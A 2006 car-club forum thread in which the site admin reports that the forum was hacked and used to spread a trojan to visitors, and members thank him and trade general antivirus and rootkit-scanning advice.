Printable Version of Topic

Posted by: SirAndy May 16 2006, 05:46 PM

just in case you missed all the fun, the 914club website was down for almost a week after we had been hacked/hijacked and a so called "Trojan" virus was planted on our server.

the intention of the virus was to be spread to our members computers to be able to gain control over as many computers as possible.

luckily, i catched it fairly quickly and shut down the site as a precaution while i was upgrading the system.

the system is once again virus free (for now) and hopefully stays that way.

if you are in doubt about your computer and you think you might have catched the virus, please, update your antivirus software to the latest version and do a full scan of your harddrive.

i'm sorry if this caused any of our members any trouble ...
Andy

Posted by: (*)(*) May 16 2006, 06:35 PM

I vote we blame it on Texas boy.....

Oh ya gud yob Ahhhndy.

Posted by: Jeroen May 16 2006, 06:35 PM

booya! we're back

thanks for the good work Herr Andy!!!
have a rum-coke on me

Posted by: trekkor May 16 2006, 06:37 PM

Glad to be back home.


KT

Posted by: MW 914 May 16 2006, 06:38 PM

I just woke from a horrible dream! I had this repeating nightmare that every day for a week I woke up and tried to log on and all I got was a splash page. It was horrible!! Glad it was only a dream....

Thanks Andy!

Posted by: Gint May 16 2006, 06:40 PM

Damn! I was hoping for another week off!

Posted by: DonTraver May 16 2006, 06:43 PM

Thanks for your hard work Andy, it's appreciated.

Don

Posted by: dekman May 16 2006, 06:44 PM

Thank You! and all who helped........

Posted by: URY914 May 16 2006, 06:47 PM

Andy you have done it again. THANK YOU.

Posted by: 396 May 16 2006, 06:49 PM

Thank you ..and those who initiated this virus - f OFF

Posted by: Aaron Cox May 16 2006, 07:01 PM

andy- just for fun. past tense of catch is caught.


thanks for all your hard work boss!

Posted by: grasshopper May 16 2006, 07:11 PM

grr...aaron said it before me! lol, just poking at you andy

Posted by: grasshopper May 16 2006, 07:13 PM

P.S. I got it before you shut the club down, and if anyone else cares, it takes control of your virus protection(mine was norton) and it will shut it down. Luckily, we have to virus protection systems, so the other one caught it. It could get nasty quick, so I would recommend checkin it out.

Posted by: sixnotfour May 16 2006, 07:15 PM

Good Job Andy

Posted by: riverman May 16 2006, 07:21 PM

Thanks Andy. And thanks to all those who helped Andy, too. Life is much better when the 914Club is around.

Posted by: jd74914 May 16 2006, 07:26 PM

wouldn't that be TWO

thanks andy

Posted by: drewvw May 16 2006, 07:32 PM

hot damn we're back! nice work as always andy

Posted by: jimtab May 16 2006, 07:49 PM

Andy, thanks for everything...I, and many others owe you many drinks...we're not worthy....

Posted by: pokey1168 May 16 2006, 07:55 PM

[quote name='(*)(*)' date='May 16 2006, 07:35 PM' post='680980']
I vote we blame it on Texas boy.....


Not all of us are so bad.....but most of us do have guns

Posted by: rdauenhauer May 16 2006, 07:58 PM

Thanks Andy

Posted by: bondo May 16 2006, 08:00 PM

Thanks again!

Posted by: ClayPerrine May 16 2006, 08:08 PM

Posted by: mack914 May 16 2006, 08:09 PM

Thanks for all the hard work...

Posted by: grantsfo May 16 2006, 08:12 PM

Great work Andy! Thanks!

Posted by: Brad Roberts May 16 2006, 08:13 PM

Andy,

was it a name/password issue on the update page?


B

Posted by: SirAndy May 16 2006, 08:18 PM

nope ...

Posted by: Brett W May 16 2006, 08:19 PM

You Da Man. Thanks Andy.

Posted by: Headrage May 16 2006, 08:25 PM

Thanks Andy...

Posted by: Grimstead May 16 2006, 08:27 PM

Thank You Sir!

Posted by: markb May 16 2006, 08:28 PM

Thanks Andy!!

Posted by: Gary May 16 2006, 08:32 PM

Andy, you rock. Thanks for all the hard work!

Posted by: Mrs. K May 16 2006, 08:33 PM

Exactly!
Thanks Andy!

Lisa

Posted by: kwales May 16 2006, 08:35 PM

Yaaaaayyyyyyy!!!!!!!!

Sor Ahndie does it again.....

In honor of your hard work and diligence, little kitty wanted the change to my avatar...


Ken

Posted by: Porsche Rescue May 16 2006, 09:01 PM

Andy, you and the site are appreciated.

Posted by: mikelsr May 16 2006, 09:04 PM

Dude you rock!

Posted by: 9146R May 16 2006, 09:06 PM

Andy,
You R da-man....thanks for your tireless efforts on our behalf....much appreciated. Missed this site big time.
Greg

Posted by: jonwatts May 16 2006, 09:08 PM

So far no Alpha so it looks like the patch it holding.

Thanks admin gang!

Posted by: turboman808 May 16 2006, 09:19 PM

It's about time here I was just got my car and got a million questions, then the sight goes down

Posted by: MBowman325 May 16 2006, 09:22 PM

Finally get 'round to getting another 914, come to the site, and it was down! Glad it's back up!

Posted by: bmcwilli May 16 2006, 09:22 PM

I've been running OSX on a powerbook for over 3 years. Nary a virus.

Apple just released an Intel Macbook for less than $1100. yes, it WILL run windows, and yes Windows on a mac is still insecure.

If you have no compelling reason that you MUST own a Wintel machine, check out the Mac.

Posted by: rick 918-S May 16 2006, 09:27 PM

Pheeewww! I thought I was out o here for a month...

Posted by: Scott Carlberg May 16 2006, 10:45 PM

Hey Andy,
why the FUCH are you apologizing?


Many have said it before me, many will say it AGAIN & AGAIN,

THANK YOU for ALL your hard work on this home, er, website!

Posted by: eg914 May 16 2006, 10:45 PM

Not to be redundant (or repetative) THANKS for all the hard work, this site is great!

Posted by: ppickerell May 16 2006, 10:59 PM

I hit my bookmark 2-3 times a day during the shutdown. But after seeing das pelikanpost I desisted, then checked my IP against the felony list and was relieved to see that I was clean. Thanks for all of your efforts.

Posted by: Midtowner May 17 2006, 12:15 AM

Thank you Andy! I really missed this place!

Posted by: Andyrew May 17 2006, 12:42 AM

*twitches*

Im

*twitch*

Recovering slowly from the site

*twitch*

being down..

Another week, and I would have died..

THANKS ANDY!!!!!!!!!!!!!!!!!!!!!*twitch*!!!!!!!!!!!!!!!!!!!

Posted by: ThinAir914 May 17 2006, 12:47 AM

Did this thing have a name?

Posted by: SirAndy May 17 2006, 01:21 AM

PHP Exploit called "r57 shell" ...
http://www.symantec.com/avcenter/venc/data/php.rstbackdoor.html

BUT that's only the part that infected the *server* ...

the part that infected the members computers is "Hacktool.IE.Exploit" ...


Andy

Posted by: Brad Roberts May 17 2006, 01:26 AM

It was listed back in 05? I *thought* I saw Norton running on the machine? Did Norton catch it?

Can I upload thew McAffee client that you can monitor from anywhere?


B

Posted by: SirAndy May 17 2006, 01:38 AM

norton didn't catch it because there was nothing to catch (i'm talking about the server part here) ...
and McAffee would not have catched it either ...

the actual trojan that was downloaded to the mebers machines is pretty old, it's been around for a while ...

brad, i just told you on the phone how they got into the server. did you hear me say anything about them planting a "file" ?

the anti-virus software on the server never catched it because there was nothing to catch. by the time the guy was done, all that was left was a *link* in the main index page of this BBS to a hacker owned server that automatically downloaded the 2nd part of the attack to whomever was looking at the index page ...

they only used our server as a "host"
and all they hosted was a *link* to the actual backdoor trojan that resides on their own server ...

does this make any sense?

*NO* amount of anti-virus software on the server would have prevented this, BUT up to date anti-virus software on the viewers part would have catched the trojan.
as it did on my machine. i actually had windows defender go bezerk when i looked at the clubsite.
that's when i went and shut it down immediately ...

Andy

Posted by: Brad Roberts May 17 2006, 01:48 AM

I understood how they did it, but I did not understand that it was a two piece Trojan. I dont recall us speaking about the hyperlink. I do understand how they have to "phone home".


B

Posted by: ablose58 May 17 2006, 06:05 AM

THANK YOU SO MUCH ANDY FOR ALL YOUR HARD WORK!!! I'll buy ya a cold one @ WCC2006!! AL

Posted by: tdgray May 17 2006, 06:15 AM

Major Props Andy...

The fix is back :insertneedleinarmsmilie:

Posted by: alpha434 May 17 2006, 06:53 AM

I shut down my system just before you guys did, I guess. But after secluding the drive and scanning it, I found 2 trojans that had come from this site. One only manifests itself during boot to reinstall something else. I deleted a considerable number of files that were infected. Norton nor AVG detected the second trojan. I used Avast! as a third checker and it got 7 files.

I suppose that it may not have actually come from this site. Just that my computer was infected with both on the same day/time. Might be a good idea to check for another trojan, though.

Posted by: william harris May 17 2006, 07:34 AM

Thank you Andy. The days without this site SUCK!

Posted by: maxwelj May 17 2006, 07:42 AM

At the risk of dating myself....Far Out!.. No I can decompress..

Thanks Andy..We don't appreciate you enough!

Posted by: Bartlett 914 May 17 2006, 07:43 AM

My engine is blown, the weather has been cold and rainy and the site was down. What a nightmare! Now Thanks the site is up, It is sunny and warm. Did you do that too?

Thanks for the hard work Andy. It is so good to be back online.

Mark

Posted by: bmunday May 17 2006, 08:17 AM

Thanks Andy!!!!!

Posted by: fiid May 17 2006, 08:28 AM

Thanks Andy - must have been a lot of hard work - I'll get you a beer next time we hang out

Posted by: Part Pricer May 17 2006, 08:39 AM

I've noticed that we have a new version of IPB. That should thwart the google-hackers.




Attached image(s)

Posted by: Howard May 17 2006, 09:00 AM

I couldn't get on here after 8pm last night, but works fine this morning. Any idea what the problem was/is? Should I be looking for a bug in my system?

Posted by: mikerose May 17 2006, 09:02 AM

Thanks Andy

Mike

Posted by: SirAndy May 17 2006, 11:08 AM

yes. in fact, i want *everyone* to scan and double-scan their computers. and not just for the virus i mentioned, like alpha said, there could be more by now.

everybody, please, do a *full* scan of your harddrive ...

Andy

Posted by: GTeener May 17 2006, 03:29 PM

Thank you Andy for all your hard work getting us back together.

You rock dude!

Posted by: cantley914 May 17 2006, 03:56 PM

Thanks Andy

We can`t thank you enough.
We appreciate your hard work.

Steph

Posted by: JB 914 May 18 2006, 11:23 PM

many of the viruses these online banking crooks are using blow thru Norton like it's not even there. I've got a netopia router, Norton AV corporate that updates constantly and Windows defender. none of them went off. i had to find mine thru trial and error. then i confirmed it with: http://www.sysinternals.com/Utilities/RootkitRevealer.html

Rootkits are some scary stuff. I'm formatting all my PC's just to be safe.

i also installed winpatrol and ewido anti malware.

Posted by: jasons May 18 2006, 11:57 PM

Is this thing Windows specific? I surf on Linux

Posted by: JB 914 May 19 2006, 12:14 AM

I think Rootkits originated in linux.

Posted by: tiim5 May 19 2006, 12:29 AM

What should Mac OS X folks do about this?

Posted by: SirAndy May 19 2006, 10:22 AM

with this one, you *should* be fine, as should any linux users ...

but, if you have any aniti-virus software, i'd still run a full check ...
Andy